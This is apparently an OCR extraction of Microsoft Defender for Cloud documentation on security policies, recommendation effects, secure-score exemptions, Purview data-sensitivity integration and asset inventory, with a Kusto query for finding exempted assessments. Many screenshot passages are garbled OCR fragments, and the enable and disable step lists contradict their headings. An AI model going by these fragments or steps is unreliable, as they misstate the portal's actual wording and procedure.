©) Defender plans 


@ Email notifications Ea E Default initiative 


TS Workflow automation 


© Integrations The default initiative enabled on your subscription generates the security recommendations in the Recommendations page. 
Continuous export 


Policy settings 


© Security policy 


© Governance rules (preview) 
^ Industry & regulatory standards 


Compliance initiatives shown in the Regulatory compliance dashboard. 


Microsoft cloud security Track Microsoft Cloud Security Out of the box 
benchmark Benchmark controls in the Compliance 

Dashboard, based on a recommended 

set of policies and assessments. 


Disable 


PCI DSS 3.2.1 Track PCI-DSS v3.2.1:2018 controls in Out of the box 
the Compliance Dashboard, based on a 
recommended set of policies and 
assessments. 


Disable 


ISO 27001 Track ISO 27001:2013 controls in the Out of the box 
Compliance Dashboard, based ona Disable 
recommended set of policies and 
assessments. 


SOC TSP Track SOC TSP controls in the Out of the box 
Compliance Dashboard, based on a Di 
recommended set of policies and E 


assessments 


Add more standards 


This Security policy screen reflects the action taken by the policies assigned on 
the subscription or management group you selected. 


e Use the links at the top to open a policy assignment that applies on the 
subscription or management group. These links let you access the 
assignment and manage recommendations. For example, if you see that a 
particular recommendation is set to audit effect, use to change it to deny 
or disable from being evaluated. 


e Inthe list of recommendations, you can see the effective application of the 
recommendation on your subscription or management group. 


e The recommendations’ effect can be: 


Audit evaluates the compliance state of resources according to 
recommendation logic. 

Deny prevents deployment of non-compliant resources based on 
recommendation logic. 


Disabled prevents the recommendation from running. 


= Microsoft Azure (Preview) P Search resources, services, and docs (G+/) , & © ‘CONTOsO.cOM $ 


Home 


ASC Default (Subscription-Id) x 


CyberSecSOC 


@: Open in Azure Policy A Guides & Feedback 


P Sear h Resource type: All X Effect: All X Y Add filter 

Name î Resource type Effect © Exempted resources Additional parameters 
A maximum of 3 owners should be designated for subscriptions Subscription Audit Oof1 None 

API Management services should use a virtual network Azure resource Audit - Default 


Access to storage accounts with firewall and virtual network configurations should be restricted Audit 0 of 94 None 

Accounts with owner per ces should be MFA enabled Audit 0of1 None 

Accounts with read permi s should be MFA enabled Audit 0of1 None 

Accounts with write pern n Azure resources should be MFA enabled Audit ZEA None 

Adaptive application controls for defining safe applications should be enabled on your machines Audit EGO None 

Adaptive network hardening recommendations should be applied on internet facing virtual machines Virtual machine Audit 0of71 None 

All network ports should be restricted on network security groups associated to your virtual machine Virtual machine Audit Oof71 None 

Allowlist rules in your adaptive application control policy should be updated Virtual machine +2 © Audit Oof71 None 

App Configuration should use private link Azure resource Audit - None 

Audit retention for SQL servers should be set to at least 90 days ‘SQL server Audit 0of8 None 

Auditing on SQL server should be enabled SQL server Audit Oof8 None 

Authentication to Linux machines should require SSH keys Virtual machine Audit Oof29 Default bt 
Auto provisioning of the Log Analytics agent should be enabled on subscriptions Audit ZEA None Q 
Automation account variables should be encrypted ion account variable Audit O of 17 None SO 
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Enable a security recommendation 


Some recommendations might be disabled by default. For example, in the Azure 
Security Benchmark initiative, some recommendations are provided for you to enable 
only if they meet a specific regulatory or compliance requirement for your organization. 
For example: recommendations to encrypt data at rest with customer-managed keys, 


such as "Container registries should be encrypted with a customer-managed key 
(CMK)". 


To enable a disabled recommendation and ensure it's assessed for your resources: 
1. From Defender for Cloud's menu, open the Environment settings page. 


2. Select the subscription or management group for which you want to disable a 
recommendation. 


3. Open the Security policy page. 
4. From the Default initiative section, select the relevant initiative. 


5. Search for the recommendation that you want to disable, either by the search bar 
or filters. 


6. Select the ellipses menu, select Manage effect and parameters. 
7. From the effect section, select Audit. 


8. Select Save. 


Microsoft Azure (Preview) E Search resources, services, and docs (G+/) EI E aA & © Q CONTOSO.COM $ 


Home 


ASC Default (Subscription-Id) 


CyberSecSOC 


@: Open in Azure Policy Ay Guides & Feedback 


[ P Search Resource type : All X Effect: All X Y Add filter 


Accounts with owner permissions on Azure resources should be MFA enabled 

Accounts with read permissions on Azure resources should be MFA enabled 

Accounts with write permissions on Azure resources should be MFA enabled 

Adaptive application controls for defining safe applications should be enabled on your machines 
Adaptive network hardening recommendations should be applied on internet facing virtual machines 
All network ports should be restricted on network security groups associated to your virtual machine 
Allowlist rules in your adaptive application control policy should be updated 

App Configuration should use private link 

Audit retention for SQL servers should be set to at least 90 days 

Auditing on SQL server should be enabled 

Authentication to Linux machines should require SSH keys 

Auto provisioning of the Log Analytics agent should be enabled on subscriptions 

Automation account variables should be encrypted 

Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed 

Azure Arc-enabled Kubernetes clusters should have the Defender extension installed 

Azure Backup should be enabled for virtual machines 

Azure Cosmos DB accounts should have firewall rules 


Azure Cosmos DB accounts should use Azure Active Directory as the only authentication method 
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O Note 


Subscription 
Subscription 

Subscription 

Virtual machine +2 © 
Virtual machine 

Virtual machine 

Virtual machine +2 © 

Azure resource 

SQL server 

SQL server 

Virtual machine 
Subscription 

Automation account variable 
Connected cluster 
Connected cluster 

Virtual machine 

Azure resource 


Azure resource 


Manage effect and parameters x 


Automation account variables should be encrypted 


Effect © 


O Audit 


O Disabled 
© beny 


a 


DEE Tz Reset vo defo 


Setting will take effect immediately, but recommendations will update based 


on their freshness interval (up to 12 hours). 


Manage a security recommendation's settings 


It may be necessary to configure additional parameters for some recommendations. As 


an example, diagnostic logging recommendations have a default retention period of 1 


day. You can change the default value if your organizational security requirements 


require logs to be kept for more than that, for example: 30 days. The additional 


parameters column indicates whether a recommendation has associated additional 


parameters: 


Default — the recommendation is running with default configuration 


Configured — the recommendation’s configuration is modified from its default values 


None - the recommendation doesn't require any additional configuration 


1. From Defender for Cloud's menu, open the Environment settings page. 


2. Select the subscription or management group for which you want to disable a 


recommendation. 


3. Open the Security policy page. 


4. From the Default initiative section, select the relevant initiative. 


5. Search for the recommendation that you want to configure. 


Tip 
To view all available recommendations with additional parameters, using the 
filters to view the Additional parameters column and then default. 

6. Select the ellipses menu and select Manage effect and parameters. 


7. From the additional parameters section, configure the available parameters with 


new values. 


8. Select Save. 


= Microsoft Azure (Preview) © Search resources, services, and docs (G+/) El R 2 & O FH contosocom E 


Home Manage effect and parameters x 
ASC Default (Su bscription-Id) i Container CPU and memory limits should be enforced 
CyberSecSOC 

Effect © 


E Open in Azure Policy E Guides & Feedback 


@ audit 
P Search Resource type: All X Effect: All X E Add filter O Disabled 
Azure Event Grid domains should use private link Azure resource Aut 

O peny 
Azure Event Grid topics should use private link Azure resource 
Azure Kubernetes Service clusters should have Defender profile enabled Managed cluster eurra B 

itional parameters 
Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed Managed cluster Max allowed CPU units in Kubernetes cluster © 
2 

Azure Machine Learning workspaces should use private link Azure resource [32 
Azure Spring Cloud should use network injection Servers Max allowed memory bytes in Kubernetes cluster © 

| 64Gi 
Blocked accounts with owner permissions on Azure resources should be removed Subscription 

Kubernetes namespaces to exclude from monitoring of memory and CPU limits © 

Blocked accounts with read and write permissions on Azure resources should be removed Subscription 

| L'kube-system", "gatekeeper-system’, "azure-arc", "azuredefender’, "mdc"] 
CORS should not allow every resource to access Function Apps Function app 

Kubernetes image to exclude from monitoring of all container related polices © 
CORS should not allow every resource to access Web Applications Web application ir 
Cognitive Services accounts should restrict network access Azure resource 
Container CPU and memory limits should be enforced Managed cluster 
Container hosts should be configured securely Container host Aut 
Container images should be deployed from trusted registries only Managed cluster Aut 
Container registries should not allow unrestricted network access Container registry Aut 
Container registries should use private link Container registry Au 
Container registry images should have vulnerability findings resolved Container registry Au Q 
Container with privilege escalation should be avoided Managed cluster Aut 
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Use the "reset to default" button to revert changes per the recommendation and restore 
the default value. 


Disable a security recommendation 


When your security policy triggers a recommendation that's irrelevant for your 
environment, you can prevent that recommendation from appearing again. To disable a 
recommendation, select an initiative and change its settings to disable relevant 
recommendations. 


The recommendation you want to disable will still appear if it's required for a regulatory 
standard you've applied with Defender for Cloud's regulatory compliance tools. Even if 


you've disabled a recommendation in the built-in initiative, a recommendation in the 


regulatory standard's initiative will still trigger the recommendation if it's necessary for 
compliance. You can't disable recommendations from regulatory standard initiatives. 


Learn more about managing security recommendations. 
1. From Defender for Cloud's menu, open the Environment settings page. 
2. Select the subscription or management group for which you want to enable a 
recommendation. 
© Note 


Remember that a management group applies its settings to its subscriptions. 
If you disabled a subscription's recommendation, and the subscription 
belongs to a management group that still uses the same settings, then you 
will continue to receive the recommendation. The security policy settings will 
still be applied from the management level and the recommendation will still 
be generated. 

3. Open the Security policy page. 


4. From the Default initiative section, select the relevant initiative. 


5. Search for the recommendation that you want to enable, either by the search bar 
or filters. 


6. Select the ellipses menu, select Manage effect and parameters. 
7. From the effect section, select Disabled. 


8. Select Save. 


O Note 


Setting will take effect immediately, but recommendations will update based 
on their freshness interval (up to 12 hours). 


Next steps 
This page explained security policies. For related information, see the following pages: 


e Learn how to set policies using PowerShell 
e Learn how to edit a security policy in Azure Policy 


e Learn how to set a policy across subscriptions or on Management groups using 


Azure Policy 
e Learn how to enable Defender for Cloud on all subscriptions in a management 


group 


Exempting resources and 
recommendations from your secure 
score 


Article e 06/19/2023 


A core priority of every security team is to ensure analysts can focus on the tasks and 
incidents that matter to the organization. Defender for Cloud has many features for 
customizing the experience and making sure your secure score reflects your 


organization's security priorities. The exempt option is one such feature. 


When you investigate your security recommendations in Microsoft Defender for Cloud, 
one of the first pieces of information you review is the list of affected resources. 


Occasionally, a resource will be listed that you feel shouldn't be included. Or a 
recommendation will show in a scope where you feel it doesn't belong. The resource 
might have been remediated by a process not tracked by Defender for Cloud. The 
recommendation might be inappropriate for a specific subscription. Or perhaps your 
organization has decided to accept the risks related to the specific resource or 
recommendation. 


In such cases, you can create an exemption for a recommendation to: 


e Exempt a resource to ensure it isn't listed with the unhealthy resources in the 
future, and doesn't impact your secure score. The resource will be listed as not 
applicable and the reason will be shown as "exempted" with the specific 
justification you select. 


e Exempt a subscription or management group to ensure that the recommendation 
doesn't impact your secure score and won't be shown for the subscription or 
management group in the future. This relates to existing resources and any you 
create in the future. The recommendation will be marked with the specific 
justification you select for the scope that you selected. 


Availability 


Aspect Details 


Aspect Details 


Release Preview 

state: The Azure Preview Supplemental Terms Z include additional legal terms that apply 
to Azure features that are in beta, preview, or otherwise not yet released into 
general availability. 


Pricing: This is a premium Azure Policy capability that's offered at no more cost for 
customers with Microsoft Defender for Cloud's enhanced security features 
enabled. For other users, charges might apply in the future. 


Required Owner or Resource Policy Contributor to create an exemption 
roles and To create a rule, you need permissions to edit policies in Azure Policy. 
permissions: Learn more in Azure RBAC permissions in Azure Policy. 


Limitations: | Exemptions can be created only for recommendations included in Defender for 
Cloud's default initiative, Microsoft cloud security benchmark, or any of the 
supplied regulatory standard initiatives. Recommendations that are generated 
from custom initiatives can't be exempted. Learn more about the relationships 
between policies, initiatives, and recommendations. 


Clouds: © Commercial clouds 
* National (Azure Government, Azure China 21Vianet) 


Define an exemption 


To fine-tune the security recommendations that Defender for Cloud makes for your 


subscriptions, management group, or resources, you can create an exemption rule to: 


e Mark a specific recommendation or as "mitigated" or "risk accepted". You can 
create recommendation exemptions for a subscription, multiple subscriptions, or 
an entire management group. 

e Mark one or more resources as "mitigated" or "risk accepted" for a specific 


recommendation. 


O Note 


Exemptions can be created only for recommendations included in Defender for 
Cloud's default initiative, Microsoft cloud security benchmark or any of the supplied 
regulatory standard initiatives. Recommendations that are generated from any 
custom initiatives assigned to your subscriptions cannot be exempted. Learn more 
about the relationships between policies, initiatives, and recommendations. 


@ Tip 


You can also create exemptions using the API. For an example JSON, and an 
explanation of the relevant structures see Azure Policy exemption structure. 
To create an exemption rule: 
1. Open the recommendations details page for the specific recommendation. 


2. From the toolbar at the top of the page, select Exempt. 


Azure DDoS Protection Standard should be enabled & x 
Severity Freshness interval Exempted resources 
| Medium ® 24 Hours TO 31 View exemptions 


A^ Description 


Microsoft Defender for Cloud has discovered virtual networks with Application Gateway resources unprotected by the DDoS protection service. These resources contain public IPs. 
Enable mitigation of network volumetric and protocol attacks. 


wv Remediation steps 
^ Affected resources 


Unhealthy resources (4) Healthy resources (1) Not applicable resources (214) 


O Search virtual networks 


Name Ty Subscription 
<-> FW-Vnet Contoso 

<-> TestVnet1 Contoso 

<-> CH-VNET-Sec Contoso Hotels 
<-> CH-VNET-Pri Contoso Hotels 


3. In the Exempt pane: 
a. Select the scope for this exemption rule: 


e |f you select a management group, the recommendation will be exempted 
from all subscriptions within that group 

e |f you're creating this rule to exempt one or more resources from the 
recommendation, choose "Selected resources" and select the relevant 
ones from the list 


b. Enter a name for this exemption rule. 
c. Optionally, set an expiration date. 


d. Select the category for the exemption: 


e Resolved through 3rd party (mitigated) — if you're using a third-party 
service that Defender for Cloud hasn't identified. 


O Note 


When you exempt a recommendation as mitigated, you aren't given 
points towards your secure score. But because points aren't removed 


for the unhealthy resources, the result is that your score will increase. 


e Risk accepted (waiver) — if you've decided to accept the risk of not 
mitigating this recommendation 


e. Enter a description. 


f. Select Create. 


Home > Microsoft Defender for Cloud 


Exempt x 
Azure DDoS Protection Standard. 1! sbssriptions 


You can exempt a recommendation from any scope so that it doesn't affect your secure 


© Exempt score. The resources’ status will change to “not applicable”. 
It might take up to 30 min for exemption to take effect 
, Learn more 
Severity Freshness interval 
Medium 24 Hours 
OO Exemption is powered by Azure policy and offered for Microsoft Defender for Goud 


customers with no additional cost. For other customers, please follow Azure policy pricing 
to learn more about future costs. Learn more 


A^ Description 


Exemption scope 


Microsoft Defender for Cloud has discovered virtual networks with i 
© Scope selection 


O Selected MG 0 selecte 
(O) Selected subscriptions 11 selected 


^ Affected resources O Selected resources 


Enable mitigation of network volumetric and protocol attack: 


wv Remediation steps 


Unhealthy resources (4) Healthy resources (1) Exemption details 


| Ø Search virtual networks Exemption name * 
g Name (O) | ASC-Azure DDoS Protection Standard should be enabled 
C] <-> Fw-vnet © [_] Set an expiration date 


L] 4> Testvnett 
C] ZO CH-VNET-Sec 


[L] <> CH-VNET-Pri © Exemption category * © 
O Resolved through 3rd party (Mitigated) 


O Risk accepted (Waiver) 


Trigger logic app Exempt Exemption description © 


When the exemption takes effect (it might take up to 30 minutes): 


e The recommendation or resources won't impact your secure score. 


e |f you've exempted specific resources, they'll be listed in the Not applicable 
tab of the recommendation details page. 


e If you've exempted a recommendation, it will be hidden by default on 
Defender for Cloud's recommendations page. This is because the default 
options of the Recommendation status filter on that page are to exclude Not 
applicable recommendations. The same is true if you exempt all 
recommendations in a security control. 

Each security control below represents a security risk you should mitigate. 


Address the recommendations in each control, focusing on the controls worth the most points. 
To get the max score, fix all recommendations for all resources in a control. Learn more > 


D Search recommendations | Control status : 2 Selected Recommendation status : 2 Selected 
(m) Select all E (m) Select all 

Controls Control status Recommendation status 
e Active ei Active 


> Remediate vulnerabilities 
Completed Completed 
> Enable encryption at rest i) P E p 


> Remediate security configurations LI Not applicable L pekotza 


e The information strip at the top of the recommendation details page updates 


the number of exempted resources: 


Azure DDoS Protection Standard should be enabled 


ZA Exempt 
Severity Freshness interval Exempted resources 
i Medium D 24 Hours ZA 35 View exemptions 


4. To review your exempted resources, open the Not applicable tab: 


^ Affected resources 


Unhealthy resources (0) Healthy resources (2) Not applicable resources (5) 


Ø Search storage accounts (©) 


Name TA, Subscription Reason 


m storagetest123456 private-babrowns Exempt Mitigated 
eee exemptuintest2 private-babrowns Exempt Mitigated gd 


bi exemptiontest4 private-babrowns Exempt Mitigated 


= exemptiontest3 private-babrowns Exempt Waiver 


— . ir 
== exemptiontest private-bé Manage exemption ) 


The reason for each exemption is included in the table (1). 
To modify or delete an exemption, select the ellipsis menu ("...") as shown (2). 
5. To review all of the exemption rules on your subscription, select View exemptions 
from the information strip: 
@ Important 


To see the specific exemptions relevant to one recommendation, filter the list 
according to the relevant scope and recommendation name. 


Home > Microsoft Defender for Cloud > Azure DDoS Protection Standard should be enabled 


Exemptions 
QO Refresh 
Scope Exemption category Search 
ASC DEMO BB Alicategories w |_| Filter by name or ID... 
Total exemptions Exemptions approaching expiration Exemptions expired 


43 0 E 


within next 7 days 


Policy exemption Ty Assignment Ty Scope Ty Exemption category [Ty Expiration date Ty 
© ASC-sqlDbEncryptionMonitoring Enable Monitoring in Microsoft Def... ASC DEMO waiver 
@ ASC-sqlDbEncryptionMonitoring Enable Monitoring in Microsoft Def... ASC DEMO waiver 
. BE Edit exemption 
@ ASC-azurePolicyAddonStatus Enable Monitoring in Microsoft Def... ASC DEMO/asc-... | waiver dn 
@ ASC-azurePolicyAddonStatus Enable Monitoring in Microsoft Def... ASC DEMO/asc-... | waiver 
@ ASC-Vulnerability assessment sh... Enable Monitoring in Microsoft Def ... ASC DEMO Mitigated View assignment 
@ ASC-Vulnerability assessment sh... Enable Monitoring in Microsoft Def... ASC DEMO Mitigated View compliance 


@ ASC-vmssExtension-installlogA-. Enable Monitoring in Microsoft Def .. ASC DEMO/ASC... | Mitigated 


Q Tip 


Alternatively, use Azure Resource Graph to find recommendations with 
exemptions. 


Monitor exemptions created in your 
subscriptions 


As explained earlier on this page, exemption rules are a powerful tool providing granular 
control over the recommendations affecting resources in your subscriptions and 
management groups. 


To keep track of how your users are exercising this capability, we've created an Azure 
Resource Manager (ARM) template that deploys a Logic App Playbook and all necessary 
API connections to notify you when an exemption has been created. 


e To learn more about the playbook, see the tech community blog post How to keep 
track of Resource Exemptions in Microsoft Defender for Cloud Z 

e You'll find the ARM template in the Microsoft Defender for Cloud GitHub 
repository £ 

e To deploy all the necessary components, use this automated process E 


Use the inventory to find resources that have 
exemptions applied 


The asset inventory page of Microsoft Defender for Cloud provides a single page for 
viewing the security posture of the resources you've connected to Defender for Cloud. 


Learn more in Explore and manage your resources with asset inventory. 


The inventory page includes many filters to let you narrow the list of resources to the 
ones of most interest for any given scenario. One such filter is the Contains exemptions. 
Use this filter to find all resources that have been exempted from one or more 
recommendations. 


Fa Microsoft Defender for Cloud | Inventory ~ x 


ng 67 subscriptions 


[e Search (Ctrl+/) | ‘ O Refresh -} Add non-Azure servers ES Open query 4 Download CSV report [5 © Learn more 


General 


Filter by name Subscriptions == All Resource Groups == All X Resource types == All X 


Recommendations == All > bo Add filter 


‘iptions 


Microsoft Defender for _ _ 
== All X 


Overvi 
K EE Agent monitoring == Monitored (175) >< 


@ Getting started 


Total Resources Unhez 


Add filter 


š= Recommendations 


© security alerts a 175 TA Filter [ Contains Exemptions Vv 
"s Inventory E Operator 
Resource name Ty ire Def... Ty Recomme... Ty 
@ workbooks Value 2 selected a | 
k) aks-agentpool-23324682-vr mm 
Th mss | o | KO es - 
Cloud Security EO lect all 
type @ Select a b 
© Secure Score = No (171) 
KA amaz-505 virt E On — 
D Regulatory compliance = Yes (4) 
ee JL ec2amaz-505720k Se E E d _ On — 
Ọ Microsoft Defender for Cloud = 
EH mi Virtual machines ASC DEMO © Monitored On — 
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E Security solutions TI E gl-test4 Virtual machines ASC DEMO © Monitored On ESE 
ZA Workflow automation TI E test-wdeg Virtual machines ASC DEMO © Monitored On = 
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@ Cloud connectors 


Find recommendations with exemptions using 
Azure Resource Graph 


Azure Resource Graph (ARG) provides instant access to resource information across your 
cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick 
and efficient way to query information across Azure subscriptions programmatically or 
from within the Azure portal. 


To view all recommendations that have exemption rules: 


1. Open Azure Resource Graph Explorer. 


Microsoft Azure Peet] € 


Dashboard 


Services See all 


Y Microsoft Defender for C 
Cc 


Showing 73 subscriptions = 
z Resource Graph queries 


La. eres EE 


2. Enter the following query and select Run query. 


Kusto 

securityresources 

| where type == "microsoft.security/assessments" 
// Get recommendations in useful format 

| project 


['TenantID'] = tenantId, 

['SubscriptionID'] = subscriptionId, 

['AssessmentID'] = name, 

['DisplayName'] = properties.displayName, 

['ResourceType'] = tolower(split(properties.resourceDetails.Id,"/"). 
[7]), 

['ResourceName'] = tolower(split(properties.resourceDetails.Id,"/"). 
[8]), 

['ResourceGroup'] = resourceGroup, 

['ContainsNestedRecom'] = 
tostring(properties.additionalData.subAssessmentsLink), 
['StatusCode'] = properties.status.code, 

['StatusDescription'] = properties.status.description, 
['PolicyDefID'] = properties.metadata.policyDefinitionId, 
['Description'] = properties.metadata.description, 

['RecomType'] = properties.metadata.assessmentType, 

['Remediation'] = properties.metadata.remediationDescription, 
['Severity'] = properties.metadata.severity, 

['Link'] = properties.links.azurePortal 

| where StatusDescription contains "Exempt" 


Learn more in the following pages: 


e Learn more about Azure Resource Graph. 
e How to create queries with Azure Resource Graph Explorer 
e Kusto Query Language (KQL) 


Next steps 


In this article, you learned how to exempt a resource from a recommendation so that it 


doesn't impact your secure score. For more information about secure score, see: 


e Secure score in Microsoft Defender for Cloud 


Leverage Purview Catalog to protect 
sensitive data (Preview) 


Article e 03/28/2023 


Microsoft Purview Data Catalog, Microsoft's data governance service, provides rich 
insights into the sensitivity of your data. With automated data discovery, sensitive data 
classification, and end-to-end data lineage, Microsoft Purview Data Catalog helps 


organizations manage and govern data in hybrid and multicloud environments. 


Microsoft Defender for Cloud customers using Microsoft Purview Data Catalog can 
benefit from another important layer of metadata in alerts and recommendations: 
information about any potentially sensitive data involved. This knowledge helps solve 
the triage challenge and ensures security professionals can focus their attention on 
threats to sensitive data. 


This page explains the integration of Microsoft Purview Data Catalog in Defender for 
Cloud. 


You can learn more by watching this video from the Defender for Cloud in the Field 


video series: 


e Integrate Microsoft Purview with Microsoft Defender for Cloud 


O Note 


Microsoft Defender for Cloud also provides data sensitivity context by enabling the 
sensitive data discovery (preview). The integration between Microsoft Purview Data 
Catalog and Microsoft Defender for Cloud described in this page offers a 
complementary source of data context for resources not covered by the sensitive 
data discovery feature. 


e Purview Catalog provides data context only for resources in subscriptions not 
onboarded to sensitive data discovery feature or resource types not 
supported by this feature. 

e Data context provided by Purview Catalog is provided as is and does not 


consider the data sensitivity settings. 


Learn more in Data-aware security posture (preview). 


Availability 


Aspect Details 
Release Preview. 
state: The Azure Preview Supplemental Terms % include additional legal terms that apply 


to Azure features that are in beta, preview, or otherwise not yet released into 
general availability. 


Pricing: You'll need a Microsoft Purview account to create the data sensitivity classifications 
and run the scans. The integration between Purview and Microsoft Defender for 
Cloud doesn't incur extra costs, but the data is shown in Microsoft Defender for 
Cloud only for enabled plans. 


Required Security admin and Security contributor 

roles and 

permissions: 

Clouds: © Commercial clouds (Regions: East US, East US 2, West US 2, West Central US, 


South Central US, Canada Central, Brazil South, North Europe, West Europe, UK 
South, Southeast Asia, Central India, Australia East) 

* Azure Government 

* Azure China 21Vianet (Partial: Subset of alerts and vulnerability assessment for 
SQL servers. Behavioral threat protections aren't available.) 


The triage problem and Defender for Cloud's 
solution 


Security teams regularly face the challenge of how to triage incoming issues. 


Defender for Cloud includes two mechanisms to help prioritize recommendations and 
security alerts: 


e For recommendations, we've provided security controls to help you understand 
how important each recommendation is to your overall security posture. Defender 
for Cloud includes a secure score value for each control to help you prioritize your 


security work. Learn more in Security controls and their recommendations. 


e For alerts, we've assigned severity labels to each alert to help you prioritize the 
order in which you attend to each alert. Learn more in How are alerts classified?. 


However, where possible, you'd want to focus the security team's efforts on risks to the 
organization's data. If two recommendations have equal impact on your secure score, 
but one relates to a resource with sensitive data, ideally you'd include that knowledge 
when determining prioritization. 


Microsoft Purview's data sensitivity classifications and data sensitivity labels provide that 


knowledge. 


Discover resources with sensitive data 


To provide information about discovered sensitive data and help ensure you have that 
information when you need it, Defender for Cloud displays information from Microsoft 


Purview in multiple locations. 


Purview Catalog scans produce insights into the nature of the sensitive information so 
you can take action to protect that information: 


e |f a resource is scanned by multiple Microsoft Purview accounts, the information 
shown in Defender for Cloud relates to the most recent scan. 

e Classifications and labels are shown for resources that were scanned within the last 
three months. 

e Purview Catalog adds data sensitivity context only for resources not covered by 
the sensitive data discovery (preview) feature in Defender for Cloud. 


Alerts and recommendations pages 


When you're reviewing a recommendation or investigating an alert, the information 
about any potentially sensitive data involved is included on the page. You can also filter 
the list of alerts by Data sensitivity classifications and Data sensitivity labels to help 
you focus on the alerts that relate to sensitive data. 


This vital layer of metadata helps solve the triage challenge and ensures your security 
team can focus its attention on the threats to sensitive data. 


Inventory filters 


The asset inventory page has a collection of powerful filters to group your resources 
with outstanding alerts and recommendations according to the criteria relevant for any 
scenario. These filters include Data sensitivity classifications and Data sensitivity labels. 
Use these filters to evaluate the security posture of resources on which Purview Catalog 


has discovered sensitive data. 


rs Microsoft Defender for Cloud | Inventory 


Showing 73 subscriptions 
[e Search (Ctrl+/) | « 
General 
D overview 
@ Getting started 
Z= Recommendations 
o Security alerts 
@ workbooks 
GO Community 
d Diagnose and solve problems 
Cloud Security 
Ọ Secure Score 
B Regulatory compliance 
Q workload protections 
E, Firewall Manager 
Management 
I Environment settings 
iii Security solutions 


ZA Workflow automation 


© Refresh -+ Add non-Azure servers TZ Open query 


Filter by name | Subscriptions == All 


Installed applications == All >X< 


Total resources Unhealthy resources 


S4 &4 


Resource name TA 


= purviewadls Secret + 2 more 


B, ninjasal Secret 


B ticketreservation Secret 


B purviewninjasql Secret 


4 Download CSV report A © Learn more 


Resource Groups == All X< Resource types == All X Defender for Cloud == All X 


Data sensitivity classifications 


Unmonit 
0 Filter | Data sensitivity classifications bai | 
Operator | == v | 

Resource Value | O selected v | 
Storage; P | 
SQL serv eg Select all 
SQL databases World Cities (4) 
SQL databases Person's Name (4) 


Email Address (4) 


Country/Region (4) 


A Credit Card Number (4) 


EU Phone Number (Deprecated) (3) 


IP Address (3) 


Personal IP Address (3) 


U.S. Phone Number (3) 


U.S. State Name (3) 


EU Debit Card Number (2) 


Canada Social Insurance Number (2) 


Date of Birth (1) 


U.S. Social Security Number (SSN) (1) 


International Banking Account Number (IBAN) (1) t d 


EU National Identification Number (1) 


Resource health 


When you select a single resource - whether from an alert, recommendation, or the 
inventory page - you reach a detailed health page showing a resource-centric view with 
the important security information related to that resource. 


The resource health page provides a snapshot view of the overall health of a single 
resource. You can review detailed information about the resource and all 
recommendations that apply to that resource. Also, if you're using any of the Microsoft 
Defender plans, you can see outstanding security alerts for that specific resource too. 


When reviewing the health of a specific resource, you'll see the Purview Catalog 
information on this page and can use it to determine what data has been discovered on 
this resource. To explore more details and see the list of sensitive files, select the link to 
launch Microsoft Purview Data Catalog. 


Resource health (Preview) 


5 Os 


Active recommendations Active alerts 


Resource information 


Subscription Reso 


Cyber soc 


Environment Location 


Azure eastus 


Status 
Ready 


Security value 


Data classifications 


Person's Name (10) 
World Cities (5) 
Country/Region (4) 


See more (9) 


Purview account 


purviewninjacatalog 


O Note 


Recommendations Alerts 


| 2 Search by 


ID, title, or affected resource | 


Severity 4 Alert title Ty 


@ suspected brute-force attack attempt 
9 Suspected brute-force attack attempt 
@ Suspected brute-force attack attempt 
D Suspected brute-force attack attempt 
@ Suspected brute-force attack attempt 
@ Suspected brute-force attack attempt 
@ Suspected brute-force attack attempt 


@ Login from an unusual location 


Page | 1 vy | of 1 


Subscription == Cyber 


Status == Active >X 


Activity start time (UTC+2) Ty 
10/27/21, 07:00 AM 
10/25/21, 09:05 PM 
10/25/21, 05:20 PM 
10/24/21, 07:00 AM 
10/22/21, 05:47 PM 
10/22/21, 05:20 PM 
10/22/21, 03:06 PM 


10/21/21, 11:29 PM 


Severity == Low, Medium, High X< 


MITRE ATT&CK® tactics Status Ty 


TE Pre-attack Active 
TE Pre-attack Active 
TE Pre-attack Active 
TE Pre-attack Active 
TE Pre-attack Active 
TE Pre-attack Active 
TE Pre-attack Active 
ZZ initial Access Active 


e If the data in the resource is updated and the update affects the resource 


classifications and labels, Defender for Cloud reflects those changes only after 


Purview Catalog rescans the resource. 


e |f Microsoft Purview account is deleted, the resource classifications and labels 


are still be available in Defender for Cloud. 


e Defender for Cloud updates the resource classifications and labels within 24 


hours of the Purview Catalog scan. 


Attack path 


Some of the attack paths consider resources that contain sensitive data, such as “AWS 


S3 Bucket with sensitive data is publicly accessible”, based on Purview Catalog scan 


results. 


Security explorer 


The Cloud Map shows resources that “contains sensitive data”, based on Purview scan 


results. You can use resources with this label to explore the map. 


e To see the classification and labels of the resource, go to the inventory. 


e To see the list of classified files in the resource, go to the Microsoft Purview 
compliance portal. 


Learn more 


You can check out the following blog: 


e Secure sensitive data in your cloud resources“. 


Next steps 
For related information, see: 


e What is Microsoft Purview? 

e Microsoft Purview's supported data sources and file types and supported data 
stores 

e Microsoft Purview deployment best practices 

e How to label to your data in Microsoft Purview 


Use asset inventory to manage your 
resources’ security posture 


Article e 06/19/2023 


The asset inventory page of Microsoft Defender for Cloud shows the security posture of 
the resources you've connected to Defender for Cloud. Defender for Cloud periodically 
analyzes the security state of resources connected to your subscriptions to identify 
potential security issues and provides you with active recommendations. Active 
recommendations are recommendations that can be resolved to improve your security 
posture. 


Use this view and its filters to address such questions as: 


e Which of my subscriptions with Defender plans enabled have outstanding 
recommendations? 

e Which of my machines with the tag ‘Production’ are missing the Log Analytics 
agent? 

e How many of my machines tagged with a specific tag have outstanding 
recommendations? 

e Which machines in a specific resource group have a known vulnerability (using a 
CVE number)? 


The security recommendations on the asset inventory page are also shown in the 
Recommendations page, but here they're shown according to the affected resource. 


Learn more about implementing security recommendations. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Free 


Some features of the inventory page, such as the software inventory 
require paid solutions to be in-place 


Required roles and All users 
permissions: 


Aspect Details 


Clouds: © Commercial clouds 
OO National (Azure Government, Azure China 21Vianet) 


Software inventory isn't currently supported in national clouds. 


What are the key features of asset inventory? 


The inventory page provides the following tools: 


Microsoft Defender for Cloud | Inventory ~ x 


Showing 8 subscriptions 


C D) Refresh -} Add non-Azure servers E Open query 4 Download CSV report d © Learn more A Guides & Feedback 


© Filter by name | Subscriptions == All Resource Groups == All X Resource types == All X Defender for Cloud == All X Monitoring agent == All X 


Environment == All X Recommendations == All X Installed applications == All X H7 Add filter 


Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 
Gu 1904 | 318 % 0 % 0 
A © ix) 
